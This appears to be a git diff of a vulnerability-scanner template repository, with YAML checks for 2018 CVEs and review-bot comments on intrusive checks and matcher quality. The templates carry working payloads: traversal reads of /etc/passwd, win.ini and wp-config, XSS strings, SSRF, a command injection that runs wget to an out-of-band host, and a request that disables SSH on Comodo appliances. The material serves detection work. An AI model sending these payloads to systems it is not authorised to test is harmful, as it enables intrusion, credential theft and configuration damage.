4b0a00483046022100d885469712b05ac45397c99f298d40a4f35f51d458dcf1eb2f348d6f37e99d8d0221008877396522c40d91e8310151db81bb0fef4088fbeb7a9ea8e827b7610899af1a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cve-2018-14912-3315.yaml b/poc/cve/cve-2018-14912-3315.yaml deleted file mode 100644 index f54857e4e3..0000000000 --- a/poc/cve/cve-2018-14912-3315.yaml +++ /dev/null 
@@ -1,27 +0,0 @@ -id: CVE-2018-14912 -info: - name: cgit < 1.2.1 Directory Traversal - author: 0x_Akoko - severity: critical - description: cgit_clone_objects in CGit before 1.2.1 has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. - reference: - - https://cxsecurity.com/issue/WLB-2018080034 - - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-14912 - cwe-id: CWE-22 - tags: cve,cve18,Cgit,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-15517-3331.yaml b/poc/cve/cve-2018-15517-3331.yaml deleted file mode 100644 index e90608b124..0000000000 --- a/poc/cve/cve-2018-15517-3331.yaml +++ /dev/null 
@@ -1,29 +0,0 @@ -id: CVE-2018-15517 - -info: - name: D-LINK Central WifiManager Server-Side Request Forgery - description: "D-LINK Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser." - reference: - - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517 - author: gy741 - severity: high - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N - cvss-score: 8.60 - cve-id: CVE-2018-15517 - cwe-id: CWE-918 - tags: cve,cve2018,dlink,ssrf,oast - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/" - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/04/06 diff --git a/poc/cve/cve-2018-16133-3358.yaml b/poc/cve/cve-2018-16133-3358.yaml deleted file mode 100644 index bf652a55d2..0000000000 --- a/poc/cve/cve-2018-16133-3358.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2018-16133 -info: - name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal - author: 0x_Akoko - severity: medium - description: Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal in the URI. - reference: - - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html - - http://www.cybrotech.com/ - - https://www.cvedetails.com/cve/CVE-2018-16133 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2018-16133 - cwe-id: CWE-22 - tags: cve,cve2018,cybrotech,lfi -requests: - - raw: - - |+ - GET \..\..\..\..\Windows\win.ini HTTP/1.1 - Host: {{Hostname}} - - unsafe: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and diff --git a/poc/cve/cve-2018-16167-3359.yaml b/poc/cve/cve-2018-16167-3359.yaml new file mode 100644 index 0000000000..59d9a3a939 --- /dev/null +++ b/poc/cve/cve-2018-16167-3359.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-16167 +info: + name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) + author: gy741 + severity: critical + description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + reference: + - https://www.exploit-db.com/exploits/49918 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 + tags: cve,cve2018,logontracer,rce,oast + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16167 + cwe-id: CWE-78 +requests: + - raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" 
diff --git a/poc/cve/cve-2018-16288-3365.yaml b/poc/cve/cve-2018-16288-3365.yaml
new file mode 100644
index 0000000000..d31045c5bb
--- /dev/null
+++ b/poc/cve/cve-2018-16288-3365.yaml
@@ -0,0 +1,32 @@
+id: CVE-2018-16288
+
+info:
+ name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
+ reference:
+ - https://www.exploit-db.com/exploits/45440
+ - https://www.cvedetails.com/cve/CVE-2018-16288
+ tags: cve,cve2018,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.60
+ cve-id: CVE-2018-16288
+ cwe-id: CWE-200
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2018-17422-3421.yaml b/poc/cve/cve-2018-17422-3421.yaml
deleted file mode 100644
index 68f71442de..0000000000
--- a/poc/cve/cve-2018-17422-3421.yaml
+++ /dev/null
@@ -1,34 +0,0 @@ -id: CVE-2018-17422 -info: - name: dotCMS < 5.0.2 - Open Redirect - author: 0x_Akoko,daffainfo - severity: medium - description: | - dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. - reference: - - https://github.com/dotCMS/core/issues/15286 - - https://www.cvedetails.com/cve/CVE-2018-17422 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-17422 - cwe-id: CWE-601 - metadata: - shodan-query: http.title:"dotCMS" - verified: "true" - tags: cve,cve2018,redirect,dotcms -requests: - - method: GET - path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "self.location = 'http://www.interact.sh'" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-17431-3423.yaml b/poc/cve/cve-2018-17431-3423.yaml new file mode 100644 index 0000000000..43bc26ce6b --- /dev/null +++ b/poc/cve/cve-2018-17431-3423.yaml 
@@ -0,0 +1,38 @@
+id: CVE-2018-17431
+info:
+ name: Comodo Unified Threat Management Web Console - Remote Code Execution
+ author: dwisiswant0
+ severity: critical
+ description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability.
+ reference:
+ - https://www.exploit-db.com/exploits/48825
+ - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-17431
+ - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2018-17431
+ cwe-id: CWE-287
+ tags: cve,cve2018,comodo,rce
+requests:
+ - raw:
+ - |
+ GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ - | # to triggering RCE
+ GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Configuration has been altered"
+ part: body
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/13
diff --git a/poc/cve/cve-2018-19386.yaml b/poc/cve/cve-2018-19386.yaml
deleted file mode 100644
index 99c0432e06..0000000000
--- a/poc/cve/cve-2018-19386.yaml
+++ /dev/null
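Review bot: The first raw request is not a passive probe: its `k` parameter URL-decodes to the console words `service`, `ssh`, `disable`, and the body matcher waits for "Configuration has been altered", so a positive result means the scan itself changed the appliance's configuration. Nothing in `info` tells the operator this. I would add the tag, `tags: cve,cve2018,comodo,rce,intrusive`, and a sentence in `description` saying that the check disables the SSH service on a vulnerable device, so the template can be excluded from routine scans and the setting restored after a match.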
@@ -1,42 +0,0 @@ -id: CVE-2018-19386 - -info: - name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI. - remediation: | - Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer. - reference: - - https://i.imgur.com/Y7t2AD6.png - - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19386 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19386 - cwe-id: CWE-79 - epss-score: 0.00177 - epss-percentile: 0.54825 - cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: solarwinds - product: database_performance_analyzer - tags: cve,cve2018,solarwinds,xss - -http: - - method: GET - path: - - "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f" - - matchers-condition: and - matchers: - - type: word - words: - - '' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-19877(1).yaml b/poc/cve/cve-2018-19877(1).yaml deleted file mode 100644 index 1a7a7645d2..0000000000 --- a/poc/cve/cve-2018-19877(1).yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: CVE-2018-19877 -info: - name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting - author: arafatansari - severity: medium - description: | - Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file. - reference: - - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ - - https://www.exploit-db.com/exploits/45958/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19877 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,adiscon,xss -requests: - - method: GET - path: - - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'value="">' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-20010(1).yaml b/poc/cve/cve-2018-20010(1).yaml deleted file mode 100644 index ca5de31180..0000000000 --- a/poc/cve/cve-2018-20010(1).yaml +++ /dev/null 
@@ -1,47 +0,0 @@ -id: CVE-2018-20010 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider-account.php Username field. - reference: - - https://www.exploit-db.com/exploits/46373/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 - - https://github.com/domainmod/domainmod/issues/88 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20010 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/ssl-provider-account.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= - - | - GET /assets/ssl-accounts.php HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and diff --git a/poc/cve/cve-2018-20011(1).yaml b/poc/cve/cve-2018-20011(1).yaml new file mode 100644 index 0000000000..b48e1aa0cb --- /dev/null +++ b/poc/cve/cve-2018-20011(1).yaml 
@@ -0,0 +1,47 @@
+id: CVE-2018-20011
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/category.php CatagoryName, StakeHolder parameters.
+ reference:
+ - https://www.exploit-db.com/exploits/46374/
+ - https://github.com/domainmod/domainmod/issues/88
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-20011
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-20011
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve1028,domainmod,xss,authenticated
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /assets/add/category.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=
+ - |
+ GET /assets/categories.php HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(all_headers_3, "text/html")'
+ - 'contains(body_3, ">")'
+ condition: and
diff --git a/poc/cve/cve-2018-20470-3497.yaml b/poc/cve/cve-2018-20470-3497.yaml
deleted file mode 100644
index 913e599c3a..0000000000
--- a/poc/cve/cve-2018-20470-3497.yaml
+++ /dev/null
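Review bot: `tags` contains `cve1028`, which looks like a typo for `cve2018`; anyone selecting templates by year tag would miss this one. I would change the line to `tags: cve,cve2018,domainmod,xss,authenticated`. The description also spells the parameter `CatagoryName`, which is worth checking against the application's own field name. The second request appears to create a category record holding the script string on the target, so adding `intrusive` to the tags would let operators leave it out of scans against production data.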
@@ -1,39 +0,0 @@ -id: CVE-2018-20470 - -info: - name: Tyto Sahi pro 7.x/8.x - Local File Inclusion - author: daffainfo - severity: high - description: | - Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. - reference: - - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-20470 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-20470 - cwe-id: CWE-22 - tags: cve,cve2018,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - - - type: status - status: - - 200 -# Enhanced by mp on 2022/06/17 diff --git a/poc/cve/cve-2018-20985-3507.yaml b/poc/cve/cve-2018-20985-3507.yaml deleted file mode 100644 index c641ac61ca..0000000000 --- a/poc/cve/cve-2018-20985-3507.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: CVE-2018-20985 -info: - name: WordPress Payeezy Pay <=2.97 - Local File Inclusion - author: daffainfo - severity: critical - description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. - reference: - - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ - - https://wordpress.org/plugins/wp-payeezy-pay/#developers - - https://www.cvedetails.com/cve/CVE-2018-20985/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-20985 - cwe-id: CWE-20 - tags: cve,cve2018,wordpress,lfi,plugin -requests: - - method: POST - path: - - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php" - body: "x_login=../../../wp-config" - matchers-condition: and - matchers: - - type: word - words: - - "The base configuration for WordPress" - - "define( 'DB_NAME'," - - "define( 'DB_PASSWORD'," - condition: and - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/13 diff --git a/poc/cve/cve-2018-3167.yaml b/poc/cve/cve-2018-3167.yaml deleted file mode 100644 index 44aa36c08d..0000000000 --- a/poc/cve/cve-2018-3167.yaml +++ /dev/null 
@@ -1,47 +0,0 @@ -id: CVE-2018-3167 - -info: - name: Oracle E-Business Suite - Blind SSRF - author: geeknik - severity: medium - description: Oracle E-Business Suite, Application Management Pack component (User Monitoring subcomponent), is susceptible to blind server-side request forgery. An attacker with network access via HTTP can gain read access to a subset of data, connect to internal services like HTTP-enabled databases, or perform post requests towards internal services which are not intended to be exposed. Affected supported versions are 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, and 12.2.7. - remediation: | - Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. - reference: - - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html - - http://web.archive.org/web/20211206102649/https://securitytracker.com/id/1041897 - - https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 - - https://nvd.nist.gov/vuln/detail/CVE-2018-3167 - - http://www.securitytracker.com/id/1041897 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2018-3167 - epss-score: 0.00727 - epss-percentile: 0.7853 - cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* - metadata: - max-request: 1 - vendor: oracle - product: application_management_pack - framework: e-business_suite - tags: cve,cve2018,oracle,ebs,ssrf,blind - -http: - - method: POST - path: - - '{{BaseURL}}/OA_HTML/lcmServiceController.jsp' - - body: - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Unexpected text in DTD' - - - type: status - status: - - 200 -# digest: 4a0a0047304502205f8a37119fe732f7badb9d33b0b8bbb0a9984a14dc7dbc2e5a29af9e0255f448022100936e614a40ccff6d1b2e850a9dbbc0a248f721b2aaab7040dc2dc6bf25257756:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/cve-2018-5233-3567.yaml b/poc/cve/cve-2018-5233-3567.yaml deleted file mode 100644 index 8233b5cde4..0000000000 --- a/poc/cve/cve-2018-5233-3567.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-5233 -info: - name: Grav CMS before 1.3.0 allows XSS. - author: pikpikcu - severity: medium - description: | - Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-5233 - - https://sysdream.com/news/lab/2018-03-15-cve-2018-5233-grav-cms-admin-plugin-reflected-cross-site-scripting-xss-vulnerability/ - - http://www.openwall.com/lists/oss-security/2018/03/15/1 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-5233 - cwe-id: CWE-79 - tags: cve,cve2018,xss,grav -requests: - - method: GET - path: - - "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - text/html diff --git a/poc/cve/cve-2018-6008-3574.yaml b/poc/cve/cve-2018-6008-3574.yaml new file mode 100644 index 0000000000..1e302599a3 --- /dev/null +++ b/poc/cve/cve-2018-6008-3574.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2018-6008 + +info: + name: Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion + author: daffainfo + severity: high + description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter. + reference: + - https://www.exploit-db.com/exploits/43913 + - https://www.cvedetails.com/cve/CVE-2018-6008 + - https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-6008 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-6008 + cwe-id: CWE-200 + tags: cve,cve2018,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/08 diff --git a/poc/cve/cve-2018-6200-3578.yaml b/poc/cve/cve-2018-6200-3578.yaml deleted file mode 100644 index feaf1462b9..0000000000 --- a/poc/cve/cve-2018-6200-3578.yaml +++ /dev/null 
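Review bot: The regex matcher `root:.*:0:0:` is looser than it needs to be and has no `part`, so any response line that contains `root:` and, further along, `:0:0:` satisfies it. Other templates in this commit already use the tighter form; I would write `- "root:[x*]:0:0"` and add `part: body` to the matcher. The same loose pattern is used in the added CVE-2019-14251 and CVE-2019-16278 templates, and the latter has no status matcher either.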
@@ -1,32 +0,0 @@ -id: CVE-2018-6200 -info: - name: vBulletin 3.x.x & 4.2.x - Open Redirect - author: 0x_Akoko,daffainfo - severity: medium - description: | - vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter. - reference: - - https://cxsecurity.com/issue/WLB-2018010251 - - https://www.cvedetails.com/cve/CVE-2018-6200 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-6200 - cwe-id: CWE-601 - metadata: - verified: true - tags: cve,cve2018,redirect,vbulletin -requests: - - method: GET - path: - - '{{BaseURL}}/redirector.php?url=https://interact.sh' - - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-6910-3585.yaml b/poc/cve/cve-2018-6910-3585.yaml new file mode 100644 index 0000000000..0517017275 --- /dev/null +++ b/poc/cve/cve-2018-6910-3585.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-6910 +info: + name: DedeCMS 5.7 path disclosure + author: pikpikcu + severity: high + description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-6910 + - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md + - https://kongxin.gitbook.io/dedecms-5-7-bug/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-6910 + cwe-id: CWE-668 + tags: cve,cve2018,dedecms +requests: + - method: GET + path: + - "{{BaseURL}}/include/downmix.inc.php" + matchers-condition: and + matchers: + - type: word + words: + - "downmix.inc.php" + - "Call to undefined function helper()" + part: body + condition: and + - type: status + status: + - 200 
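Review bot: The CVE-2018-6910 template requests only `include/downmix.inc.php`, although its description names `inc/inc_archives_functions.php` as a second entry point, so a clean result says nothing about the second file. Simply adding that path would not help, because the `downmix.inc.php` word in the `condition: and` list would not appear in the other file's error. I would state the coverage in the file, e.g. `# probes include/downmix.inc.php only; inc/inc_archives_functions.php is not checked`.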
diff --git a/poc/cve/cve-2018-7251-3587.yaml b/poc/cve/cve-2018-7251-3587.yaml deleted file mode 100644 index 17ebdb1a9e..0000000000 --- a/poc/cve/cve-2018-7251-3587.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-7251 - -info: - name: AnchorCMS Error Log Exposure - author: pdteam - severity: critical - tags: cve,cve2018,anchorcms,logs,error - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-7251 - cwe-id: CWE-200 - description: "An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred." - reference: - - https://github.com/anchorcms/anchor-cms/issues/1247 - - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html - - https://twitter.com/finnwea/status/965279233030393856 - - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html - - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7 - -requests: - - method: GET - path: - - '{{BaseURL}}/anchor/errors.log' - matchers: - - type: word - words: - - '"date":' - - '"message":' - - '"trace":[' - condition: and diff --git a/poc/cve/cve-2018-7467-3598.yaml b/poc/cve/cve-2018-7467-3598.yaml new file mode 100644 index 0000000000..209cbb7767 --- /dev/null +++ b/poc/cve/cve-2018-7467-3598.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2018-7467 +info: + name: AxxonSoft Axxon Next Directory Traversal + author: 0x_Akoko + severity: high + description: AxxonSoft Axxon Next suffers from a directory traversal vulnerability. + reference: + - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-7467 + - http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-7467 + cwe-id: CWE-200 + tags: cve,cve2018,axxonsoft,lfi +requests: + - raw: + - |+ + GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/poc/cve/cve-2018-7700-3618.yaml b/poc/cve/cve-2018-7700-3618.yaml new file mode 100644 index 0000000000..32b525bf7f --- /dev/null +++ b/poc/cve/cve-2018-7700-3618.yaml 
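Review bot: The matchers block has no status check and no `matchers-condition`, unlike the other file-read templates added in this commit, so the three generic words `bit app support`, `fonts` and `extensions` alone decide the result. Adding `matchers-condition: and` together with a `type: status` matcher for `200` narrows a finding to responses that actually served the file. The request reads `windows\win.ini` only, so a one-line comment saying that a negative result on a non-Windows host carries no meaning would help whoever triages the output.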
